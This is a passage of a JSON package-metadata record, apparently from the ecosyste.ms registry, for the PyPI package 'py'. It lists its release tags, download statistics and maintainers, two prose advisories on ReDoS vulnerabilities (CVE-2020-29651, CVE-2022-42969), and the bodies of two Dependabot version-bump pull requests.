.4.1","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.1/manifests"},{"name":"1.4.0","sha":"4f53e577ad39d3b2bb73c9d49d5b1c765668ae7d","kind":"commit","published_at":"2010-11-25T17:14:44.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.0/manifests"},{"name":"1.3.4","sha":"bb6e9848b3a8770b199a085d3341d498bd7b50d1","kind":"commit","published_at":"2010-09-14T15:35:01.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.3.4","html_url":"https://github.com/pytest-dev/py/releases/tag/1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.4/manifests"},{"name":"1.3.3","sha":"365459295967b317b1c3765b2692ed29c3d10d95","kind":"commit","published_at":"2010-07-30T13:06:50.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.3.3","html_url":"https://github.com/pytest-dev/py/releases/tag/1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.3/manifests"},{"name":"1.3.2","sha":"caf5bdbf8935f108fa0078aabedd7bed46a76ee5","kind":"commit","published_at":"2010-07-08T15:20:52.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.3.2","html_url":"https://github.com/pytest-dev/py/releases/tag/1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.2/manifests"},{"name":"1.3.1","sha":"2e36e2619fbe564b37a6657d4370b01e6805c8cd","kind":"commit","published_at":"2010-05-25T19:01:43.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.3.1","html_url":"https://github.com/pytest-dev/py/releases/tag/1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.1/manifests"},{"name":"1.3.0","sha":"a127767da68a8f4fbee251fa9cbff657cfb5744e","kind":"commit","published_at":"2010-05-05T19:03:43.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.3.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.3.0/manifests"},{"name":"1.2.1","sha":"222a08ec03e1ea3879d4f96c6fe02a8fdec2f3b9","kind":"commit","published_at":"2010-02-08T15:39:29.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.2.1","html_url":"https://github.com/pytest-dev/py/releases/tag/1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.2.1/manifests"},{"name":"1.2.0","sha":"6756416d694ed4aa25cd7298419feaffce584eef","kind":"commit","published_at":"2010-01-18T16:00:22.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.2.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.2.0/manifests"},{"name":"1.1.1","sha":"9d5b313aad3f5610356385aa6b7f007362abc3c0","kind":"commit","published_at":"2009-11-24T14:16:58.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.1.1","html_url":"https://github.com/pytest-dev/py/releases/tag/1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.1.1/manifests"},{"name":"1.1.0","sha":"e0bca8fe519e143ab320c4567fe5de9dad8cf6e8","kind":"commit","published_at":"2009-11-05T16:46:14.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.1.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.1.0/manifests"},{"name":"1.0.2","sha":"f522838c77470b0f7d8bcdc7ed6b4e3f0407e422","kind":"commit","published_at":"2009-08-27T09:43:46.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.0.2","html_url":"https://github.com/pytest-dev/py/releases/tag/1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.2/manifests"},{"name":"1.0.1","sha":"4f50ae13364037f581c417d9acbb56b1a30f69b4","kind":"commit","published_at":"2009-08-19T16:25:11.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.0.1","html_url":"https://github.com/pytest-dev/py/releases/tag/1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.1/manifests"},{"name":"1.0.0","sha":"a94afc6b5efa730fbd647d75f1e00d7debe656b7","kind":"commit","published_at":"2009-08-04T10:02:38.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.0.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0/manifests"},{"name":"1.0.0b9","sha":"e80714d7017e74c41c0a6195518a3d0c760e5cd4","kind":"commit","published_at":"2009-07-31T13:35:22.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.0.0b9","html_url":"https://github.com/pytest-dev/py/releases/tag/1.0.0b9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b9/manifests"},{"name":"1.0.0b8","sha":"7fabb3df69fa06f57b2b0c4eb2ec5ef7325b396c","kind":"commit","published_at":"2009-07-22T14:09:49.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.0.0b8","html_url":"https://github.com/pytest-dev/py/releases/tag/1.0.0b8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b8/manifests"},{"name":"1.0.0b6","sha":"7cb096373bc2a3312ed4c1ebdfde1a0d35a7dbb8","kind":"commit","published_at":"2009-06-29T06:32:33.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.0.0b6","html_url":"https://github.com/pytest-dev/py/releases/tag/1.0.0b6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b6/manifests"},{"name":"1.0.0b3","sha":"53dc59511391a8a7d4cf2f9a3ce0b0fb8adc31df","kind":"commit","published_at":"2009-06-19T11:05:44.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.0.0b3","html_url":"https://github.com/pytest-dev/py/releases/tag/1.0.0b3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.0.0b3/manifests"}]},"repo_metadata_updated_at":"2024-09-29T05:24:37.341Z","dependent_packages_count":416,"downloads":50644166,"downloads_period":"last-month","dependent_repos_count":132961,"rankings":{"downloads":0.0324647335782556,"dependent_repos_count":0.00641958008609574,"dependent_packages_count":0.05539180531431181,"stargazers_count":10.08699448099529,"forks_count":6.514589871369957,"docker_downloads_count":0.04145214569878963,"average":2.78955210284045},"purl":"pkg:pypi/py","advisories":[{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWhqNXYtNTc0cC1tajdj","url":"https://github.com/advisories/GHSA-hj5v-574p-mj7c","title":"py vulnerable to Regular Expression Denial of Service","description":"A denial of service via regular expression in the py.path.svnwc component of py (aka python-py) through 1.9.0 could be used by attackers to cause a compute-time denial of service attack by supplying malicious input to the blame functionality.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2021-04-20T16:39:57.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-29651","https://github.com/pytest-dev/py/issues/256","https://github.com/pytest-dev/py/pull/257","https://github.com/pytest-dev/py/pull/257/commits/4a9017dc6199d2a564b6e4b0aa39d6d8870e4144","https://www.oracle.com/security-alerts/cpujul2022.html","https://github.com/advisories/GHSA-hj5v-574p-mj7c","https://github.com/pypa/advisory-database/tree/main/vulns/py/PYSEC-2020-92.yaml","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYWNYEV3FGDHPIHX4DDUDMFZ6NLCQRC4","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CHDTINIBJZ67T3W74QTBIY5LPKAXEOGR"],"source_kind":"github","identifiers":["GHSA-hj5v-574p-mj7c","CVE-2020-29651"],"repository_url":"https://github.com/pytest-dev/py","blast_radius":38.42793204586619,"packages":[{"versions":[{"first_patched_version":"1.10.0","vulnerable_version_range":"\u003c 1.10.0"}],"ecosystem":"pypi","package_name":"py"}],"created_at":"2022-12-21T16:13:07.846Z","updated_at":"2025-03-25T02:12:33.717Z","epss_percentage":0.00848,"epss_percentile":0.72717},{"uuid":"GSA_kwCzR0hTQS13NTk2LTR3dngtajlqNs4AAvXY","url":"https://github.com/advisories/GHSA-w596-4wvx-j9j6","title":"ReDoS in py library when used with subversion ","description":"The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.\n\nThe particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-10-16T12:00:23.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-42969","https://github.com/pytest-dev/py/issues/287","https://github.com/pytest-dev/py/blob/cb87a83960523a2367d0f19226a73aed4ce4291d/py/_path/svnurl.py#L316","https://github.com/pytest-dev/py/issues/288","https://github.com/pytest-dev/pytest/issues/10392","https://news.ycombinator.com/item?id=34163710","https://pypi.org/project/py","https://github.com/advisories/GHSA-w596-4wvx-j9j6","https://github.com/pypa/advisory-database/tree/main/vulns/py/PYSEC-2022-42969.yaml"],"source_kind":"github","identifiers":["GHSA-w596-4wvx-j9j6","CVE-2022-42969"],"repository_url":"https://github.com/pytest-dev/py","blast_radius":38.42793204586619,"packages":[{"versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.11.0"}],"ecosystem":"pypi","package_name":"py"}],"created_at":"2022-12-21T16:11:55.285Z","updated_at":"2025-03-25T02:08:17.270Z","epss_percentage":0.00114,"epss_percentile":0.26966}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/py","docker_dependents_count":5903,"docker_downloads_count":2151716844,"usage_url":"https://repos.ecosyste.ms/usage/pypi/py","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/py/dependencies","status":null,"funding_links":[],"critical":true,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/py/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/py/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/py/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/py/related_packages","maintainers":[{"uuid":"anatoly","login":"anatoly","name":null,"email":null,"url":null,"packages_count":64,"html_url":"https://pypi.org/user/anatoly/","role":null,"created_at":"2023-01-30T15:35:10.249Z","updated_at":"2023-01-30T15:35:10.249Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/anatoly/packages"},{"uuid":"nicoddemus","login":"nicoddemus","name":null,"email":null,"url":null,"packages_count":53,"html_url":"https://pypi.org/user/nicoddemus/","role":null,"created_at":"2023-01-30T15:35:10.339Z","updated_at":"2023-01-30T15:35:10.339Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/nicoddemus/packages"},{"uuid":"ronny","login":"ronny","name":null,"email":null,"url":null,"packages_count":57,"html_url":"https://pypi.org/user/ronny/","role":null,"created_at":"2023-01-30T15:35:10.358Z","updated_at":"2023-01-30T15:35:10.358Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/ronny/packages"},{"uuid":"hpk","login":"hpk","name":null,"email":null,"url":null,"packages_count":51,"html_url":"https://pypi.org/user/hpk/","role":null,"created_at":"2023-01-30T15:35:10.311Z","updated_at":"2023-01-30T15:35:10.311Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/hpk/packages"},{"uuid":"The_Compiler","login":"The_Compiler","name":null,"email":null,"url":null,"packages_count":21,"html_url":"https://pypi.org/user/The_Compiler/","role":null,"created_at":"2023-01-30T15:35:10.381Z","updated_at":"2023-01-30T15:35:10.381Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/The_Compiler/packages"},{"uuid":"flub","login":"flub","name":null,"email":null,"url":null,"packages_count":23,"html_url":"https://pypi.org/user/flub/","role":null,"created_at":"2023-01-30T15:35:10.291Z","updated_at":"2023-01-30T15:35:10.291Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/flub/packages"},{"uuid":"pfctdayelise","login":"pfctdayelise","name":null,"email":null,"url":null,"packages_count":9,"html_url":"https://pypi.org/user/pfctdayelise/","role":null,"created_at":"2023-01-30T15:35:10.350Z","updated_at":"2023-01-30T15:35:10.350Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/pfctdayelise/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":690424,"maintainers_count":292814,"namespaces_count":0,"keywords_count":228590,"github":"pypi","metadata":{"funded_packages_count":48950},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2025-06-06T05:32:09.692Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},"unique_repositories_count":81,"unique_repositories_count_past_30_days":0,"recent_issues":[{"uuid":"2872784603","node_id":"PR_kwDODhwVbM6rOzbb","number":1,"state":"open","title":"Bump py from 1.8.0 to 1.11.0 in the pip group across 1 directory","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-09-30T03:57:25.000Z","updated_at":"2025-09-30T03:57:25.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"py","old_version":"1.8.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"}],"path":"the pip group across 1 directory","ecosystem":"pip"},"body":"Bumps the pip group with 1 update in the / directory: [py](https://github.com/pytest-dev/py).\n\nUpdates `py` from 1.8.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.8.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=py\u0026package-manager=pip\u0026previous-version=1.8.0\u0026new-version=1.11.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/alfonsodg/Politico/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/alfonsodg/Politico/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/alfonsodg%2FPolitico/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2813516713","node_id":"PR_kwDOC8zLps6nstup","number":1,"state":"open","title":"Bump the pip group across 1 directory with 12 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-09-09T22:41:01.000Z","updated_at":"2025-09-09T22:41:02.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":12,"packages":[{"name":"certifi","old_version":"2018.1.18","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"django","old_version":"2.2.2","new_version":"4.2.24","repository_url":"https://github.com/django/django"},{"name":"flask","old_version":"1.0.2","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"flask-cors","old_version":"3.0.3","new_version":"6.0.0","repository_url":"https://github.com/corydolphin/flask-cors"},{"name":"gunicorn","old_version":"19.7.1","new_version":"23.0.0","repository_url":"https://github.com/benoitc/gunicorn"},{"name":"idna","old_version":"2.6","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"jinja2","old_version":"2.10.1","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"py","old_version":"1.5.2","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"pyjwt","old_version":"1.5.3","new_version":"2.4.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"requests","old_version":"2.22.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.25.3","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"werkzeug","old_version":"0.14.1","new_version":"3.0.6","repository_url":"https://github.com/pallets/werkzeug"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 12 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2018.1.18` | `2024.7.4` |\n| [django](https://github.com/django/django) | `2.2.2` | `4.2.24` |\n| [flask](https://github.com/pallets/flask) | `1.0.2` | `2.2.5` |\n| 